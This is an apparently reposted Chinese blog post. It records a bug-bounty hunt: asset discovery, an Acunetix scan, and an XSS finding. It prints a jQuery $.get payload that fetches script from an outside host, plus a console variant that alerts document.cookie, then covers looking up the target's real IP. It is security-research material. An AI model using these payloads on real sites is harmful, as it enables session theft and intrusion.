欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 文旅 > 艺术 > 0x06 记录一次挖src的经历(xss漏洞)

0x06 记录一次挖src的经历(xss漏洞)

2025/2/23 19:50:46 来源:https://blog.csdn.net/weixin_43263566/article/details/142006445  浏览:    关键词:0x06 记录一次挖src的经历(xss漏洞)

漏洞平台:补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC

个人总结的挖洞流程:

1)先用工具信息收集一波

我这里先用灯塔收集一下目标资产

2)然后用漏洞扫描工具扫描一波

我这里用Acunetix进行扫描

因为工具扫描需要点时间,所以我们也可以先进行手动渗透测试

漏洞扫描结果出来了,我们就可以查看一下情况

3)最后我这里发现了xss注入

 我根据告警访问他引用的文章获取到了原始是payload:Inadequate/dangerous jQuery behavior for 3rd party text/javascript responses · Issue #2432 · jquery/jquery · GitHub

$.get('http://sakurity.com/jqueryxss')

 我这里改造一下,然后拿到目标的控制台中执行

$.get('https://example.com/fakeurl').done(function(data) {alert('远程连接成功,数据:' + data);}).fail(function() {alert(document.cookie);});

4)最后如果你要提交漏洞的话你还需要收集目标域名的真实ip的地址

这里可以用在线的多地ping网站:网速测试,测网速,网站速度测试,卡卡测速网—卡卡网 www.webkaka.com

 

获取真实ip 

有真实ip后就可以获取ip地址

iP地址查询--手机号码查询归属地 | 邮政编码查询 | iP地址归属地查询 | 身份证号码验证在线查询网 (ip138.com)

 或者用站长工具查:IP/服务器120.77.143.220的信息 - 站长工具 (chinaz.com)

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词